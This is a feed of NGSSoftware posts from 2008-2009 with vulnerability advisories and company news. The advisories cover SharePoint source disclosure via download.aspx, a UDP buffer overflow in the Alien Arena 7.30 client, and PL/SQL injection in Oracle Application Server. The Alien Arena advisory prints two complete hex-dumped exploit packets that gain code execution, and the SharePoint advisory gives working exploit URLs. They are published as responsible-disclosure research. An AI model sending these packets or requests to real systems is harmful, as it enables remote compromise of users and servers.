NGSSoftware

Medium Risk Vulnerability in SharePoint Team Services

NGS — Mon, 26 Oct 2009 09:54:38 +0000

=======
Summary
=======
Name: SharePoint Team Services source code disclosure through download
facility
Release Date: 21 October 2009
Reference: NGS00532
Discover: Daniel Martin
Vendor: Microsoft
Vendor Reference:
Systems Affected: SharePoint Team Services 12.0.0.6219, 12.0.0.4518 and
possibly others
Risk: Medium
Status: Reported

========
TimeLine
========
Discovered: 17 September 2008
Released: 2 October 2008
Approved: 3 October 2008
Reported: 8 October 2008
Fixed:
Published: 23 October 2009

===========
Description
===========
Microsoft SharePoint is a browser-based collaboration and document
management platform. It can be used to host web sites that access shared
workspaces and documents, as well as specialized applications like wikis
and blogs from a browser.

It was found that the download facility of Microsoft SharePoint Team
Services can be abused to reveal the source code of ASP.NET files.

=================
Technical Details
=================
SharePoint Team Services stores a variety of files in its backend
database. These files include site templates, custom ASP.NET pages and
documents that users of the application upload to the document libraries.

Insufficient validation in the input parameters of the download facility
can result in the source code of ASP.NET files being disclosed. For
example, the source code of the default ASP.NET page available after
installing the product (http://server/Pages/Default.aspx) can be obtained
by issuing the following request:

http://server/_layouts/download.aspx?SourceUrl=/Pages/Default.aspx&Source=http://server/Pages/Default.aspx&FldUrl=

In order to retrieve the source code any file stored in the backend
database (files whose path does not start with /_layout/) it is sufficient
to craft a request that follows this pattern:

http://server/_layouts/download.aspx?SourceUrl=&Source=&FldUrl=

This bug can result in disclosure of sensitive information that can be
used by an attacker targeting the system. For instance the PublicKeyTokens
of the ASP.NET assemblies deployed in the server can be revealed enabling
an attacker to upload a malicious file that makes use of them.

===============
Fix Information
===============
It is advised that the source code of any bespoke ASP.NET file deployed in
the system is reviewed to ensure that no sensitive information would be
reviewed if an attacker abuses the download facility of the framework.
Additionally access on a need-to-know basis to SharePoint systems is
advised.

No workarounds exist at this point. However Microsoft has been contacted
so they can produce a fix for their customers. NGS has been advised that
although this issue will not be patched until the next release of
SharePoint, Microsoft has addressed the design issues around it in a
Knowledge Base article (KB976829) about security considerations when
running SharePoint that can be found at:

http://go.microsoft.com/fwlink/?LinkId=167936

NGS Software wants to thank the MSRC team and Charles Weidner in
particular for their support in clarifying this issue.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Very High Risk Vulnerability in Alien Arena 7.30

NGS — Wed, 21 Oct 2009 17:35:46 +0000

Anonymous Remote Arbitrary Code Execution in Alien Arena 7.30
————————————————————-

October 21st, 2009

A PDF version of this advisory can be found here.

=======
Summary
=======
Name: Anonymous Remote Arbitrary Code Execution in Alien Arena 7.30
Release Date: October 21st, 2009
Discoverer: Jason Geffner
Vendor: COR Entertainment
Systems Affected: Alien Arena 7.30
Risk: Very High
Status: Published

============
Introduction
============
This paper discusses how an anonymous remote attacker can execute arbitrary
code on the computers of Alien Arena’s networked players. This vulnerability
was responsibly disclosed to the authors of the game and this advisory was not
released until a fixed build of the game was released.

==========
Background
==========
Alien Arena is a popular[1] free open-source FPS game for Windows, Mac, and
Linux. It has had a history of security vulnerabilities[2] since its initial
release in 2004.

========
Timeline
========
06/19/09 Alien Arena 7.30 released
06/21/09 Anonymous remote arbitrary code execution vulnerability discovered
06/22/09 Request for contact sent to Alien Arena’s developers
06/23/09 Detailed vulnerability report responsibly disclosed to Lead Developer
of Alien Arena
06/23/09 Security vulnerability “fixed” (Revision 1390)[3]
06/23/09 Broken “fix” identified and responsibly disclosed to Lead Developer
of Alien Arena
06/23/09 Security vulnerability “fix” fixed (Revision 1391)[3]
10/08/09 Alien Arena 7.31 released, incorporating fixes above
10/16/09 Advisory written
10/21/09 Advisory released

=============
Vulnerability
=============
When the game client requests a list of network games to join, it sends a UDP
query to master.corservers.com. This server responds to the client via UDP with
a list of known game servers. The client then sends a UDP query to each of the
listed game servers, asking each for its description. The client’s parsing of
the servers’ responses is vulnerable to a buffer overflow attack.

The client is designed to listen for incoming UDP packets from
master.corservers.com and from the game servers on port 27901, however it will
accept and parse UDP packets from any IP address even if the client did not
initiate a UDP conversation with that given IP address. As such, an attacker
can send a malformed UDP packet from any source IP address; they need not know
a valid game server’s IP address to exploit this buffer overflow vulnerability.

When the client receives a UDP packet on port 27901 that specifies a server’s
description (the server-to-client “print” message), it calls the function
M_AddToServerList(…)in \client\menu.c to tokenize the rest of the UDP packet
(status_string):

| void M_AddToServerList (netadr_t adr, char *status_string)
| {
| char *rLine;
| char *token;
| char lasttoken[256];
| char seps[] = “\\”;
| …
| //parse it
|
| result = strlen(status_string);
|
| //server info - we may revisit this
| rLine = GetLine (&status_string, &result);
| …
| /* Establish string and get the first token: */
| token = strtok( rLine, seps );
| while( token != NULL ) {
| /* While there are tokens in “string” */
| if (!_stricmp (lasttoken, “admin”))
| …
| else if (!_stricmp (lasttoken, “website”))
| …
| else if (!_stricmp (lasttoken, “fraglimit”))
| …
| else if (!_stricmp (lasttoken, “timelimit”))
| …
| else if (!_stricmp (lasttoken, “version”))
| …
| else if (!_stricmp (lasttoken, “mapname”))
| …
| else if (!_stricmp (lasttoken, “hostname”))
| …
| else if (!_stricmp (lasttoken, “maxclients”))
| …
| /* Get next token: */
| strcpy (lasttoken, token);
| …

Note that the lasttoken buffer is 256 bytes long. As such, if an attacker
supplies a token longer than 256 bytes then the strcpy(…) function above will
overwrite the return address for the M_AddToServerList(…) function.

====================
Exploit, Step 1 of 2
====================
To properly orchestrate an attack and make it agnostic of the version of
Windows, an attacker would need to know a reliable return address that they can
use that satisfies the following conditions:
1. This address is constant across all versions of Windows.
2. The attacker can write code and data to this address.
3. Code at this address is readable and executable.

A global variable in Alien Arena’s executable would be ideal for this situation
since the Alien Arena developers did not link this executable for ASLR or DEP.
Since it’s a global variable and ASLR is disabled, the address will remain
constant across all versions of Windows for this version of Alien Arena, and
since DEP is not enabled, its content is executable.

When the client receives a UDP packet on port 27901 that specifies a list of
game servers (the server-to-client “servers” message), it calls the function
CL_ParseGetServersResponse() in \client\cl_main.c to parse the rest of the UDP
packet (net_message):

| void CL_ParseGetServersResponse()
| {
| …
| byte addr[4];
|
| MSG_BeginReading (&net_message);
| MSG_ReadLong (&net_message); // skip the -1
| …
| numServers = 0;
| …
| while( net_message.readcount +6 <= net_message.cursize ) {
| MSG_ReadData( &net_message, addr, 4 );
| servers[numServers].port = MSG_ReadShort( &net_message );
| ...

The following UDP data can be sent from any IP address to a client on port
27901 to store the “port” number 0xE4FF in the global variable servers[1].port,
which in Alien Arena 7.30 for Windows is located at the static address
0×05BE9734. (N.B., servers[0].port can’t be used because it is at static
address 0×05BE8F00 and the null-byte in this address can’t be used in the
“print” message).

00000000 FF FF FF FF 73 65 72 76 65 72 73 20 7F 00 00 01 ….servers ….
00000010 00 00 00 00 00 00 FF E4 ……..

Note that 0xFF 0xE4 is the machine code for “JMP ESP”. After sending the UDP
data above to the client, the attacker now knows that the assembly instruction
“JMP ESP” is located at static address 0×05BE9734.

====================
Exploit, Step 2 of 2
====================
The attacker could then send a UDP packet from any IP address to the client
consisting of the following data. This message overflows the strcpy(…)
function in M_AddToServerList(…) above and overwrites the return address with
the address of the “JMP ESP” instruction above (0×05BE9734). The highlighted
NOPs are the shellcode that gets executed. Note that those 4 NOPs can be
replaced with quite a bit of code — the data portion of the UDP packet can be
up to 2800 bytes, more than enough to do whatever an attacker would want to do.
The only restriction is no null-bytes, but that obviously wouldn’t be a problem
if an attacker used an encoded payload.

00000000 FF FF FF FF 70 72 69 6E 74 0A 5C 41 41 41 41 41 ….print.\AAAAA
00000010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000050 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000060 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000070 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000080 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000090 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000000F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000100 41 41 41 41 41 41 41 41 41 41 41 34 97 BE 05 90 AAAAAAAAAAA4….
00000110 90 90 90 0A 20 41 20 41 …. A A

==========
Conclusion
==========
It is clear that a remote attacker can anonymously execute arbitrary code on
clients’ systems by sending 2 maliciously crafted UDP packets.

It should be noted that there are likely other vulnerabilities remaining in
this codebase. NGS did not perform a comprehensive security review of Alien
Arena.

============
Observations
============
Despite the common perception in the open-source community that “given enough
eyeballs, all bugs are shallow,”[4] open-source software is still plagued by
high-impact security vulnerabilities. For this mantra to hold, not only are
“enough eyeballs” required, but the eyeballs should be those of well-trained
security professionals.

Security best-practices such as adherence to the Security Development
Lifecycle[5] are also critical when designing and developing software. It is
worth noting that even with the code-based vulnerability identified in this
advisory, a defense-in-depth approach of using ASLR and/or DEP would have
deterred exploitation if enabled.

===============
Fix Information
===============
This issue has now been resolved. Alien Arena 7.31 can be downloaded from:
http://icculus.org/alienarena/rpa/aquire.html

==========
References
==========
[1] http://games.slashdot.org/story/09/06/21/1336213
[2] http://www.securityfocus.com/archive/1/426984
[3] http://icculus.org/alienarena/changelogs/7.31.txt
[4] http://en.wikipedia.org/wiki/Linus’_Law
[5] http://msdn.microsoft.com/en-us/library/ms995349.aspx

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

NCC Group wins prestigious government IT tender

NGS — Tue, 21 Jul 2009 13:56:56 +0000

IT assurance specialist, NCC Group, has been selected for a prestigious government framework agreement covering the provision of ICT consultancy services to the public sector.

The independent IT security specialist was one of only five suppliers selected across all four security consultancy & delivery services Lots in the Buying Solutions ICT Consultancy & Delivery Services framework agreement, which comprise of planning and design, penetration and security testing, ICT investigative services, and analysis and consultancy.

138 organisations submitted valid pre-qualification questionnaires (PQQs), with 24 accepted onto the framework across seven key service Lots.

The win enables NCC Group to offer independent ICT security consultancy and delivery services to government departments, the NHS, local authorities, emergency services and other public bodies.

“This is a fantastic win for the group which will help strengthen our position as a trusted advisor to the public sector,” comments John Redeyoff, commercial development director at NCC Group plc.

“Public sector contracts are always well contested, particularly during a downturn. We’re absolutely delighted to have been selected and look forward to working with a wide range of public sector bodies on some exciting projects. The framework will give public sector customers much easier access to our services and the benefits of standard terms and conditions”

Buying Solutions, an Executive Agency of the Office of Government Commerce in the Treasury, issued a contract notice inviting bids from vendors earlier this year.

NGSSQuirreL ‘Highly Commended’ at the SC Magazine Awards 2009

NGS — Wed, 06 May 2009 10:43:02 +0000

The software development team at NGSSoftware are very happy to have been ‘Highly Commended‘ in the ‘Best Vulnerability Assessment‘ category at the SC Magazine Awards 2009.

The NGSSQuirreL range of Database Security Solutions were recognised at the European Awards ceremony which was held on the 28th April 2009 at the Hurlingham Club in London.

“The SC Magazine Awards Europe have been created to reward excellence and innovation within the IT security industry.“

NGSSoftware to assist Kaspersky with Web Attack

NGS — Wed, 11 Feb 2009 06:43:19 +0000

“Code on Kaspersky’s Web site is typically subjected to an internal and external audit. Kaspersky has hired database expert David Litchfield to investigate the incident and expects to be able to report more on the hack within 24 hours, the company said

In an e-mail interview, Litchfield said that he has done this type of investigation before. “Typically there are no problems with investigations of this type. Of course, an attacker can attempt to hide their tracks, which makes things more difficult — but by no means impossible.””

Read the full article at PCW.

The official press release from Kaspersky Lab can be found here.

NCC Group Interim Report

NGS — Tue, 27 Jan 2009 08:11:14 +0000

NCC Group plc

Strong organic growth supports 13% increase in profits and dividend up 33%

22 January 2008. NCC Group plc (LSE: NCC, “NCC Group” or “the Group”), the independent information security assurance group, has reported its interim results for the six months to 30 November 2008.

Financial Highlights

» Group revenue up 27% to £20.8m (£16.4m in 2007) - organic growth 18%

» Group adjusted operating profits* increased by 17% to £5.5m (£4.7m in 2007) - organic growth 9%

» Escrow Solutions operating profits up 19% to £5.5m

» Assurance Testing operating profits up 25% to £1.0m

» Consultancy operating profits up 71% to £0.2m

» Group adjusted pre tax profits* up by 13% to £5.2m (£4.6m in 2007)

» Adjusted diluted earnings* per share up by 13% to 11.0p (9.8p in 2007)

» Interim dividend up by 33% to 3.00p (2.25p in 2007)

» Ratio of cash inflow from operating activities before interest and tax to operating profit up to 119% (118% in 2007)

» Net debt of £11.9m following acquisition of NGSS Limited (£0.2m net debt in 2007) and payment of deferred consideration payments

Operational Highlights

» Acquisition of NGSS Limited, an Ethical Security Testing business, on 26 November 2008 for total consideration of up to £10.0m, established Group as largest Ethical Security Testing team in Europe

» Consultancy and Assurance have seen excellent growth as the public demands security over its information, held in both the public and private sectors

» New multi option £15m loan and overdraft facilities agreed in principle until July 2010

* Adjusted earnings measures: A reconciliation of adjusted operating profit, profit before tax and diluted earnings per share measures to reported adopted IFRS measures is set out in the notes. The Directors consider that the adjusted measures better reflect the ongoing performance of the business.

Rob Cotton, NCC Group Chief Executive commented:

“Despite the current economic conditions; our focus on developing a number of complementary international information and security assurance businesses, by acquisition and organic growth, away from discretionary IT services expenditure continues to show excellent returns.

“A combination of our insulation from the worst features of the economic situation, our strong recurring revenues, cash generation and concentration on the fast growing information security markets gives us considerable confidence in our business, as demonstrated by our 33% increase in dividend. We remain on course to deliver another strong set of figures for this financial year.”

Enquiries:

NCC Group (www.nccgroup.com)
0161 209 5200
Rob Cotton, Chief Executive

The full press release is avaible here (PDF).

NCC Acquisition - Formal Statement

NGS — Tue, 09 Dec 2008 12:11:09 +0000

Available here (PDF format).

NCC Group Acquisition

NGS — Fri, 28 Nov 2008 17:19:31 +0000

We are pleased to announce that Next Generation Security Software have been acquired by NCC Group. The full press release is available here.

Critical Vulnerability in Apple Quicktime’s Indeo Codec

NGS — Mon, 15 Sep 2008 16:48:39 +0000

Paul Byrne of NGSSoftware has discovered a critical vulnerability in Apple Quicktime’s implementation of the Indeo Codec (CVE-ID: CVE-2008-3615) which may allow an attacker to execute arbitrary code on a user’s system via playing a malformed movie file in Quicktime containing video encoded in the Indeo Codec. This is also possible to be executed through the Quicktime Internet Explorer Active X control. It is in the Quicktime library for Indeo in the file “ir50_32.qtx” which was previously distributed through Apple’s website but written by a third party. The codec has now been removed and is no longer supported in the latest version of Quicktime.

This issue has been resolved in the newest version of Apple Quicktime 7.5.5, to see Apple’s release go to:

http://support.apple.com/kb/HT3027

NGSSoftware are going to withhold details of this flaw for three months. Full details will be published on the 14th December 2008. This three month window will allow other vendors the time needed to create patches in their versions of Indeo Codec before the details are released to the general public. This reflects NGSSoftware’s approach to responsible disclosure.

NGSSoftware Insight Security Research
Email: nisr@ngssoftware.com
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

Critical Vulnerability in Oracle Application Server

NGS — Mon, 21 Jul 2008 05:55:30 +0000

NGSSoftware Insight Security Research Advisory

Name: PLSQL Injection in Oracle Application Server
Systems Affected: Oracle Application Server 9.0.4.3, 10.1.2.2, 10.1.4.1
Severity: Critical
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 9th October 2007
Date of Public Advisory: 15th July 2008
Advisory number: #NISR15072008
CVE: CVE-2008-2589

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows an
unauthenticated attacker on the Internet to gain full control of a backend
Oracle database server via the front end web server.

Details
*******
Oracle Application Server installs a number of PLSQL packages in the backend
database server. One of these is the WWV_RENDER_REPORT package and it is
vulnerable to PLSQL injection. This package uses definer rights execution
and therefore executes with the privileges of the owner, in this case the
highly privileged PORTAL user.

Specifically, the SHOW procedure takes as its 2nd argument the name of a
function to execute and this is embedded with a dynamically executed
anonymous block of PLSQL without first being sanitized. Because it is a
block of anonymous PLSQL, an attacker can exploit this flaw to run any SQL
statement, for example, create new users, grant dba privileges, delete or
modify data. This is achieved by wrapping the statement(s) within an
“execute immediate” statement and specifiying the autonomous_transaction
pragma.

Fix Information
***************
Oracle was alerted to this flaw on the 9th October 2007. A patch has now
been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner
designed specifically for Oracle, can be used to accurately determine
whether your servers are vulnerable to these flaws. More information about
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php

About NGSSoftware
*****************
NGSSoftware develops vulnerability assessment and compliancy tools for
database servers including Oracle, Microsoft SQL Server, DB2, Sybase and
Informix. Headquartered in the United Kingdom NGS has offices in London, St.
Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United
States; NGSConsulting provide services to some of the largest and most
demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076